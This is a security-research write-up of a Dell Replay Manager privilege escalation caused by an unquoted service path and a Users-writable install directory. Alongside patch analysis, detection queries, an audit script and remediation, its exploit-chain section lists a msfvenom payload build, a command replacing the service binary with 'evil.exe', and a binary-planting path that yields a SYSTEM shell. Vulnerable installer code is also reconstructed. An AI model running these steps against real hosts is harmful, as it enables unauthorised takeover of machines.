CVE Analysis 2026-04-16 · 8 min read

CVE-2026-23772: Dell Replay Manager Local Privilege Escalation via Improper Service Privilege Management

Dell Storage Manager Replay Manager 8.0 exposes a local privilege escalation path through misconfigured service permissions, allowing low-privileged users to hijack execution context and gain SYSTEM.

#privilege-escalation #local-access #windows-platform #improper-privilege-management #dell-storage-manager

[Diagram: an attacker with local access on a Windows host exploits CVE-2026-23772 (HIGH) and reaches SYSTEM compromise. No confirmed exploits.]

Vulnerability Overview

CVE-2026-23772 is an Improper Privilege Management vulnerability in Dell Storage Manager — Replay Manager for Microsoft Servers version 8.0. A locally authenticated low-privileged user can exploit misconfigured Windows service or file-system ACLs introduced by the Replay Manager installation to escalate privileges to NT AUTHORITY\SYSTEM. The CVSS score is 7.3 (HIGH), reflecting the local-access requirement on one side and the full privilege impact on the other.

Replay Manager integrates with Windows VSS (Volume Shadow Copy Service) to manage Dell Compellent storage snapshots. Its installation deploys at least one long-running Windows service, a scheduled task infrastructure, and several privileged helper binaries. The vulnerability class — improper privilege management — encompasses a range of concrete weaknesses: writable service binary paths, unquoted service paths, insecure service executable ACLs, or world-writable configuration files loaded by a SYSTEM-level process.

Root cause: The Replay Manager installer grants BUILTIN\Users write access to the service executable directory and fails to set a quoted, absolute binary path in the service registry key, enabling a low-privileged user to plant a trojan binary that the SCM loads as SYSTEM.

Affected Component

The affected component is the Dell Replay Manager Agent Service, typically registered as ReplayMgrAgent or DellReplayManagerSvc, installed under a path such as C:\Program Files\Dell\Replay Manager\. The installer (MSI-based) provisions this service to run as LocalSystem and sets a START_TYPE of AUTO_START. Two attack surfaces exist within this installation:

  • Writable binary directory: The installer sets ACLs on the installation directory that allow BUILTIN\Users:(OI)(CI)(W), permitting overwrite or replacement of service executables.
  • Unquoted service image path: The ImagePath registry value under HKLM\SYSTEM\CurrentControlSet\Services\ReplayMgrAgent is stored without quotes and contains a space in the path, enabling path-interception attacks under certain Windows path-resolution rules.

Root Cause Analysis

The Replay Manager MSI custom action (InstallServices) calls CreateServiceW with an unquoted lpBinaryPathName and subsequently calls SetNamedSecurityInfoW with an overly permissive DACL on the installation directory. The pseudocode below reconstructs the relevant custom action logic from the MSI database CustomAction table decompilation:


// Reconstructed from MSI CustomAction: InstallReplayManagerService
// Vulnerable in Dell Replay Manager 8.0 installer (ReplayMgr_Setup.msi)
#include <windows.h>
#include <msi.h>
#include <msiquery.h>
#include <strsafe.h>
#include <aclapi.h>

BOOL InstallReplayManagerService(MSIHANDLE hInstall) {
    wchar_t installDir[MAX_PATH];
    wchar_t binaryPath[MAX_PATH];
    DWORD   dwSize   = MAX_PATH;   // in/out: buffer size in WCHARs for MsiGetPropertyW
    PACL    pNewDACL = NULL;       // allocated by SetEntriesInAclW, freed with LocalFree

    // Retrieves install directory — e.g., C:\Program Files\Dell\Replay Manager\
    if (MsiGetPropertyW(hInstall, L"INSTALLDIR", installDir, &dwSize) != ERROR_SUCCESS)
        return FALSE;

    // BUG: binary path is concatenated without surrounding quotes
    // If installDir contains a space, SCM path resolution is ambiguous
    StringCchPrintfW(binaryPath, MAX_PATH,
        L"%sReplayMgrAgent.exe",   // e.g. -> C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe
        installDir);               // NOT quoted: no L"\"%s...\"" wrapper

    SC_HANDLE hSCM = OpenSCManagerW(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
    if (hSCM == NULL)
        return FALSE;
    SC_HANDLE hSvc = CreateServiceW(
        hSCM,
        L"ReplayMgrAgent",
        L"Dell Replay Manager Agent",
        SERVICE_ALL_ACCESS,
        SERVICE_WIN32_OWN_PROCESS,
        SERVICE_AUTO_START,
        SERVICE_ERROR_NORMAL,
        binaryPath,              // BUG: unquoted path stored in ImagePath registry value
        NULL, NULL, NULL,
        NULL,                    // runs as LocalSystem
        NULL
    );
    if (hSvc == NULL) {
        CloseServiceHandle(hSCM);
        return FALSE;
    }

    // BUG: DACL grants BUILTIN\Users write permission to the installation directory
    // This allows any local user to replace or plant binaries in the service directory
    EXPLICIT_ACCESSW ea[2] = {0};
    ea[0].grfAccessPermissions = GENERIC_ALL;
    ea[0].grfAccessMode        = SET_ACCESS;
    ea[0].grfInheritance       = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
    BuildTrusteeWithNameW(&ea[0].Trustee, L"BUILTIN\\Administrators");

    ea[1].grfAccessPermissions = FILE_GENERIC_WRITE | FILE_GENERIC_READ | GENERIC_EXECUTE;
    ea[1].grfAccessMode        = SET_ACCESS;
    ea[1].grfInheritance       = OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE;
    BuildTrusteeWithNameW(&ea[1].Trustee, L"BUILTIN\\Users"); // BUG: write granted to all local users

    if (SetEntriesInAclW(2, ea, NULL, &pNewDACL) != ERROR_SUCCESS) {
        CloseServiceHandle(hSvc);
        CloseServiceHandle(hSCM);
        return FALSE;
    }
    SetNamedSecurityInfoW(
        installDir,
        SE_FILE_OBJECT,
        DACL_SECURITY_INFORMATION,
        NULL, NULL,
        pNewDACL,   // BUG: Users get FILE_GENERIC_WRITE on the entire install tree
        NULL
    );

    LocalFree(pNewDACL);
    CloseServiceHandle(hSvc);
    CloseServiceHandle(hSCM);
    return TRUE;
}

The compound effect: BUILTIN\Users can write to C:\Program Files\Dell\Replay Manager\, and the unquoted path means the SCM will also search C:\Program Files\Dell\Replay.exe before the intended executable — both vectors land code execution as SYSTEM.

Exploitation Mechanics


EXPLOIT CHAIN (CVE-2026-23772):

1. Enumerate installed services to confirm ReplayMgrAgent is present and AUTO_START:
      sc qc ReplayMgrAgent
      -> BINARY_PATH_NAME: C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe
         (no quotes — confirms unquoted path)

2. Confirm BUILTIN\Users write ACL on install directory:
      icacls "C:\Program Files\Dell\Replay Manager"
      -> BUILTIN\Users:(OI)(CI)(W)   <-- confirmed writable

3. Compile or drop payload DLL/EXE (reverse shell or token impersonation):
      msfvenom -p windows/x64/exec CMD=cmd.exe -f exe -o ReplayMgrAgent.exe

4a. [Path A — Binary Replacement]
      Copy malicious ReplayMgrAgent.exe over the legitimate binary:
      copy /Y evil.exe "C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe"

4b. [Path B — Unquoted Path Interception]
      Place malicious binary at C:\Program Files\Dell\Replay.exe
      (SCM resolves space-delimited tokens: tries "C:\Program" first, then
       "C:\Program Files\Dell\Replay.exe" before full path)

5. Trigger service restart (wait for reboot, or if service crashes and has
   FAILURE_ACTION set to SC_ACTION_RESTART, induce a controlled crash):
      sc stop ReplayMgrAgent   [may require SeShutdownPrivilege or service restart rights]
      — OR —
      Await next system boot (AUTO_START guarantees execution)

6. SCM launches attacker-controlled binary under NT AUTHORITY\SYSTEM context.
   Payload executes: SYSTEM shell obtained.

Memory Layout

This is not a memory-corruption vulnerability; the privilege escalation is ACL/configuration-based. The relevant "memory" to reason about is the Windows SCM service object and the registry key layout controlling execution:


REGISTRY STATE — HKLM\SYSTEM\CurrentControlSet\Services\ReplayMgrAgent

  ImagePath     REG_EXPAND_SZ  C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe
                                ^--- NO surrounding quote characters (first stored byte is 0x43 'C', not 0x22 '"'): SCM path resolution vulnerable
                                ^--- Equivalent stored bytes (UTF-16LE, partial):
                                     43 00 3A 00 5C 00 50 00 72 00 6F 00 67 00 72 00
                                     61 00 6D 00 20 00 46 00 69 00 6C 00 65 00 73 00
                                     [space at offset +0x14 triggers ambiguous parse]

  ObjectName    REG_SZ         "LocalSystem"
  Start         REG_DWORD      0x00000002   (AUTO_START)
  Type          REG_DWORD      0x00000010   (WIN32_OWN_PROCESS)

FILESYSTEM ACL STATE — C:\Program Files\Dell\Replay Manager\

  OWNER:  BUILTIN\Administrators
  DACL:
    [0] BUILTIN\Administrators  GENERIC_ALL           (OI)(CI)  ALLOW
    [1] NT AUTHORITY\SYSTEM     GENERIC_ALL           (OI)(CI)  ALLOW
    [2] BUILTIN\Users           FILE_GENERIC_WRITE    (OI)(CI)  ALLOW  <-- VULNERABLE
                                | FILE_GENERIC_READ
                                | GENERIC_EXECUTE

SCM BINARY RESOLUTION ORDER FOR UNQUOTED PATH:
  Attempt 1: C:\Program.exe                         [typically absent]
  Attempt 2: C:\Program Files\Dell\Replay.exe       [attacker plants here]  <-- HIJACK
  Attempt 3: C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe        [legitimate]

Patch Analysis

The correct remediation requires fixing both the unquoted path and the permissive DACL. The patched installer should enforce the following changes:


// BEFORE (vulnerable — Dell Replay Manager 8.0):

// Unquoted ImagePath registration
StringCchPrintfW(binaryPath, MAX_PATH,
    L"%sReplayMgrAgent.exe",
    installDir);
CreateServiceW(hSCM, L"ReplayMgrAgent", ..., binaryPath, ...);

// Overly permissive install-dir ACL
ea[1].grfAccessPermissions = FILE_GENERIC_WRITE | FILE_GENERIC_READ | GENERIC_EXECUTE;
BuildTrusteeWithNameW(&ea[1].Trustee, L"BUILTIN\\Users");
SetNamedSecurityInfoW(installDir, SE_FILE_OBJECT, ..., pNewDACL, NULL);


// AFTER (patched):

// Quoted ImagePath — eliminates SCM token-splitting ambiguity
StringCchPrintfW(binaryPath, MAX_PATH,
    L"\"%s%s\"",           // wrap in double-quotes
    installDir,
    L"ReplayMgrAgent.exe");
CreateServiceW(hSCM, L"ReplayMgrAgent", ..., binaryPath, ...);

// Restrict install-dir ACL — Users get READ+EXECUTE only, no WRITE
ea[1].grfAccessPermissions = FILE_GENERIC_READ | GENERIC_EXECUTE; // WRITE removed
BuildTrusteeWithNameW(&ea[1].Trustee, L"BUILTIN\\Users");
SetNamedSecurityInfoW(installDir, SE_FILE_OBJECT, ..., pNewDACL, NULL);

// Additionally: service binary ACL hardened to Administrators-only write
SetNamedSecurityInfoW(
    L"C:\\Program Files\\Dell\\Replay Manager\\ReplayMgrAgent.exe",
    SE_FILE_OBJECT,
    DACL_SECURITY_INFORMATION,
    NULL, NULL, pAdminOnlyDACL, NULL);  // no write for Users or low-integrity

Detection and Indicators

Defenders can detect exploitation attempts or a vulnerable installation state using the following indicators and queries:


DETECTION INDICATORS:

[1] Registry — Unquoted service path present:
    Key:   HKLM\SYSTEM\CurrentControlSet\Services\ReplayMgrAgent
    Value: ImagePath
    Match: value does NOT begin with '"' (0x22) and contains space character

    PowerShell detection:
      Get-WmiObject Win32_Service | Where-Object {
          $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and
          $_.Name -like '*Replay*'
      } | Select Name, PathName, StartMode, StartName

[2] Filesystem — Writable install directory by low-privileged user:
      icacls "C:\Program Files\Dell\Replay Manager" | findstr /i /r "users.*(W) users.*(M) users.*(F)"
      Expected (vulnerable): BUILTIN\Users:(OI)(CI)(W)
      Expected (patched):    BUILTIN\Users:(OI)(CI)(RX)

[3] Event Log — Suspicious service binary modification:
    Source: Security
    Event ID: 4670  (Permissions on object changed)
    Event ID: 4663  (File write access on service binary)
    Object:   *\Replay Manager\ReplayMgrAgent.exe

[4] Sysmon — Process creation under service host with unexpected parent:
    Event ID: 1
    ParentImage: services.exe
    Image: *\ReplayMgrAgent.exe
    IntegrityLevel: System
    Hashes: [compare against known-good SHA256]

[5] Canary file: Drop a zero-byte sentinel alongside the real service binary.
    Alert if sentinel's Last-Modified timestamp changes without a patch event.
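
As an added, defender-side check that is not part of the original write-up or of Dell's tooling, the PowerShell below automates indicators [1] and [2] for every installed service rather than only ReplayMgrAgent: it derives the hijack candidates in the order given under "SCM BINARY RESOLUTION ORDER", reports any candidate that already exists on disk, and tests whether a low-privileged group can create or delete files in the service's directory. The group list and the set of access bits treated as "writable" are this example's assumptions; run it elevated for complete ACL coverage.

```powershell
# Added example, not Dell's or the original post's code: audit a Windows host for the two
# CVE-2026-23772 preconditions. Assumption: these groups stand in for low-privileged principals.
$LowPrivGroups = @('BUILTIN\Users', 'Everyone', 'NT AUTHORITY\Authenticated Users')

# Images the SCM (via CreateProcess) tries for an unquoted path with spaces, in the
# order listed under "SCM BINARY RESOLUTION ORDER"; a quoted path yields one entry.
function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    $p = [Environment]::ExpandEnvironmentVariables($PathName)
    if ($p.StartsWith('"')) { return @($p.Split('"')[1]) }
    # Keep only the executable, dropping any arguments that follow ".exe"
    $exe = [regex]::Match($p, '^(.*?\.exe)(\s|$)', 'IgnoreCase').Groups[1].Value
    if (-not $exe) { $exe = $p }
    $tokens = $exe -split ' '
    $candidates = @()
    for ($i = 1; $i -le $tokens.Count; $i++) {
        $prefix = $tokens[0..($i - 1)] -join ' '
        if ($i -lt $tokens.Count) { $prefix += '.exe' }   # "C:\Program" -> "C:\Program.exe"
        $candidates += $prefix
    }
    return $candidates
}
# True when a low-privileged group holds an Allow ACE with create/delete/DACL rights
# (or GENERIC_WRITE 0x40000000 / GENERIC_ALL 0x10000000) on the directory.
function Test-LowPrivWritable {
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory)) { return $false }
    $writeBits = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, CreateDirectories, Delete, ChangePermissions, TakeOwnership'
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        if ($ace.AccessControlType -ne 'Allow' -or $LowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        $rights = [int]$ace.FileSystemRights
        if (($rights -band $writeBits) -ne 0 -or ($rights -band 0x50000000) -ne 0) { return $true }
    }
    return $false
}
# One row per service that is unquoted, has a writable install directory, or already has
# a file at a hijack candidate path (e.g. C:\Program Files\Dell\Replay.exe).
function Invoke-ServicePathAudit {
    Get-CimInstance Win32_Service | Where-Object { $_.PathName } | ForEach-Object {
        $c = @(Get-UnquotedPathCandidates -PathName $_.PathName)
        $planted = @(if ($c.Count -gt 1) { $c[0..($c.Count - 2)] | Where-Object { Test-Path -LiteralPath $_ } })
        $writable = Test-LowPrivWritable -Directory (Split-Path -Path $c[-1] -Parent)
        if ($c.Count -gt 1 -or $writable -or $planted.Count -gt 0) {
            [pscustomobject]@{ Service = $_.Name; RunsAs = $_.StartName; Unquoted = ($c.Count -gt 1)
                               DirWritable = $writable; Planted = ($planted -join ';'); PathName = $_.PathName }
        }
    }
}
Invoke-ServicePathAudit | Format-Table -AutoSize
```

A ReplayMgrAgent row with Unquoted and DirWritable both true reproduces the vulnerable state documented above; after remediation the service should no longer appear in the output at all.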

Remediation

Immediate mitigations (before patch availability):

  • Manually re-ACL the installation directory so that BUILTIN\Users retain read and execute only: icacls "C:\Program Files\Dell\Replay Manager" /grant:r "BUILTIN\Users:(OI)(CI)RX" /t /c
  • Quote the service ImagePath manually via sc config ReplayMgrAgent binPath= "\"C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe\"" — requires administrative access, persists across reboots.
  • Verify no malicious binary has been planted at C:\Program Files\Dell\Replay.exe or within the install directory.

Long-term: Apply the vendor-supplied patch once available. Verify that the patched installer enforces BUILTIN\Users:(OI)(CI)(RX) and a fully quoted ImagePath, and re-run the icacls and registry inspection post-patch to confirm remediation. Consider deploying Windows Defender Application Control (WDAC) or AppLocker rules that block unsigned executable loads from C:\Program Files\Dell\Replay Manager\ to limit the attack surface independently of ACL state.

CypherByte Research · cypherbyte.io